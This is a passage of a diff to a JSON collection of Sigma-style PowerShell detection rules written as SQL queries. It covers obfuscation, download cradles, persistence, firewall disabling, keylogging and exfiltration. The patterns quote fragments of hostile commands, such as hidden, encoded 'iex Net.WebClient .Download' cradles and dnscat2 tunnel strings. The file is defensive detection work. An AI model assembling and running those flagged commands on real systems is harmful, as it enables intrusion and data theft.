ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\')" ], - "filename": "posh_ps_apt_silence_eda.yml" + "filename": "posh_ps_file_and_directory_discovery.yml" }, { - "title": 
"Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "title": "Suspicious PowerShell Invocations - Specific", + "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -7233,361 +6777,380 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE 
'\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" + "filename": "posh_ps_susp_invocation_specific.yml" }, { - "title": "DirectorySearcher Powershell Exploitation", - "id": "1f6399cf-2c80-4924-ace1-6fcff3393480", - "status": "test", - "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "title": "Potential COM Objects Download Cradles Usage - PS Script", + "id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", + "status": "experimental", + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", "author": "frack113", - "tags": [ - "attack.discovery", - "attack.t1018" - ], "falsepositives": [ - "Unknown" + "Legitimate use of the library" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object %' ESCAPE '\\' AND ScriptBlockText LIKE '%System.DirectoryServices.DirectorySearcher%' ESCAPE '\\' AND ScriptBlockText LIKE '%.PropertiesToLoad.Add%' ESCAPE '\\' AND ScriptBlockText LIKE '%.findall()%' ESCAPE '\\' AND ScriptBlockText LIKE '%Properties.name%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND 
Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (ScriptBlockText LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR ScriptBlockText LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR ScriptBlockText LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" ], - "filename": "posh_ps_directorysearcher.yml" + "filename": "posh_ps_download_com_cradles.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "id": "e54f5149-6ba3-49cf-b153-070d24679126", + "title": "Potential PowerShell Obfuscation Using Alias Cmdlets", + "id": "96cd126d-f970-49c4-848a-da3a09f55c55", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects Set-Alias or New-Alias cmdlet usage. 
Which can be use as a mean to obfuscate PowerShell scripts", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", + "attack.t1027", "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Set-Alias %' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Alias %' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml" + "filename": "posh_ps_susp_set_alias.yml" }, { - "title": "Enable Windows Remote Management", - "id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", - "status": "test", - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). 
The adversary may then perform actions as the logged-on user.", + "title": "Powershell Token Obfuscation - Powershell", + "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "status": "experimental", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-PSRemoting %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" ], - "filename": "posh_ps_enable_psremoting.yml" + "filename": "posh_ps_token_obfuscation.yml" }, { - "title": "Code Executed Via Office Add-in XLL File", - "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "status": "test", - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "author": "frack113", + "title": "AADInternals PowerShell Cmdlets Execution - PsScript", 
+ "id": "91e69562-2426-42ce-a647-711b8152ced6", + "status": "experimental", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "posh_ps_office_comobject_registerxll.yml" + "filename": "posh_ps_aadinternals_cmdlets_execution.yml" }, { - "title": "Modify Group Policy Settings - ScriptBlockLogging", - "id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", - "status": "experimental", - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "title": "Powershell Suspicious Win32_PnPEntity", + "id": "b26647de-4feb-4283-af6b-6117661283c5", + "status": "test", + "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" + "attack.discovery", + "attack.t1120" ], "falsepositives": [ - "Legitimate use" + "Admin script" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (ScriptBlockText LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnableSmartScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_PnPEntity%' ESCAPE '\\')" ], 
- "filename": "posh_ps_modify_group_policy_settings.yml" + "filename": "posh_ps_susp_win32_pnpentity.yml" }, { - "title": "Registry-Free Process Scope COR_PROFILER", - "id": "23590215-4702-4a70-8805-8dc9e58314a2", + "title": "Replace Desktop Wallpaper by Powershell", + "id": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", "status": "test", - "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1574.012" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%$env:COR\\_ENABLE\\_PROFILING%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER\\_PATH%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-ItemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%Registry::%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%WallPaper%' ESCAPE '\\') OR ScriptBlockText LIKE '%SystemParametersInfo(20,0,%,3)%' ESCAPE '\\'))" ], - "filename": "posh_ps_cor_profiler.yml" + "filename": "posh_ps_susp_wallpaper.yml" }, { - "title": "Powershell Timestomp", - "id": "c6438007-e081-42ce-9483-b067fbef33c3", + "title": "Powershell Execute Batch Script", + "id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", "status": "test", - "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", + "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070.006" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate admin script" + "Legitimate administration script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.CreationTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastWriteTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastAccessTime =%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%[IO.File]::SetCreationTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastAccessTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastWriteTime%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.cmd%' ESCAPE '\\' OR ScriptBlockText LIKE '%.bat%' ESCAPE '\\'))" ], - "filename": "posh_ps_timestomp.yml" + "filename": "posh_ps_susp_execute_batch_script.yml" }, { - "title": "Suspicious Start-Process PassThru", - "id": "0718cd72-f316-4aa2-988f-838ea8533277", + "title": "PowerShell Create Local User", + "id": "243de76f-4725-4f2e-8225-a8a69b15ad61", "status": "test", - "description": "Powershell use PassThru option to start in background", - "author": "frack113", + "description": "Detects creation of a local user via PowerShell", + "author": "@ROxPinTeddy", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "attack.t1059.001", + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate user creation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-PassThru %' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_start_process.yml" + "filename": "posh_ps_create_local_user.yml" }, { - "title": "Powershell Trigger Profiles by Add_Content", - "id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", - "status": "test", - "description": 
"Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", + "title": "Suspicious Get Local Groups Information - PowerShell", + "id": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", + "status": "experimental", + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1546.013" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\' AND ScriptBlockText LIKE '%$profile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Value%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"\"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%get-localgroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Get-WMIObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Group%' ESCAPE '\\')))" ], - "filename": "posh_ps_trigger_profiles.yml" + "filename": "posh_ps_susp_local_group_reco.yml" }, { - "title": "Suspicious PowerShell Mailbox SMTP Forward Rule", - "id": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", + "title": "Windows Firewall Profile Disabled", + "id": "488b44e7-3781-4a71-888d-c95abfacf44d", "status": "experimental", - "description": 
"Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.exfiltration" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate usage of the cmdlet to forward emails" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DeliverToMailboxAndForward %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ForwardingSmtpAddress %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Enabled %' ESCAPE '\\' AND ScriptBlockText LIKE '% False%' ESCAPE '\\' AND (ScriptBlockText LIKE '% -All %' ESCAPE '\\' OR ScriptBlockText LIKE '%Public%' ESCAPE '\\' OR ScriptBlockText LIKE '%Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Private%' ESCAPE '\\'))" ], - "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" + "filename": "posh_ps_windows_firewall_profile_disabled.yml" }, { - "title": "Disable Powershell Command History", - "id": "602f5669-6927-4688-84db-0d4b7afb2150", + "title": "Suspicious PowerShell Get Current User", + "id": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", "status": "experimental", - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "author": "Ali Alwashali", + "description": "Detects the use of PowerShell to identify the current logged user.", + "author": "frack113", + "tags": [ + "attack.discovery", + "attack.t1033" + 
], + "falsepositives": [ + "Legitimate PowerShell scripts" + ], + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%[System.Environment]::UserName%' ESCAPE '\\' OR ScriptBlockText LIKE '%$env:UserName%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Security.Principal.WindowsIdentity]::GetCurrent()%' ESCAPE '\\'))" + ], + "filename": "posh_ps_susp_get_current_user.yml" + }, + { + "title": "Potential Keylogger Activity", + "id": "965e2db9-eddb-4cf6-a986-7a967df651e4", + "status": "experimental", + "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.collection", + "attack.credential_access", + "attack.t1056.001" ], "falsepositives": [ - "Legitimate script that disables the command history" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::%' ESCAPE '\\')" ], - "filename": "posh_ps_disable_psreadline_command_history.yml" + "filename": "posh_ps_susp_keylogger_activity.yml" }, { - "title": "Suspicious Connection to Remote Account", - "id": "1883444f-084b-419b-ac62-e0d0c5b3693f", - "status": "test", - "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of 
the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", - "author": "frack113", + "title": "Potential Data Exfiltration Via Audio File", + "id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", + "status": "experimental", + "description": "Detects potential exfiltration attempt via audio file using PowerShell", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110.001" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.DirectoryServices.Protocols.LdapDirectoryIdentifier%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Net.NetworkCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.DirectoryServices.Protocols.LdapConnection%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Math]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%[IO.FileMode]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%BinaryWriter%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x52%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x49%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x46%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x57%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x41%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x56%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x45%' ESCAPE '\\' AND ScriptBlockText LIKE '%0xAC%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_networkcredential.yml" + "filename": "posh_ps_audio_exfiltration.yml" }, { - "title": "Powershell WMI Persistence", - "id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "title": "Powershell Trigger Profiles by Add_Content", + "id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", "status": "test", 
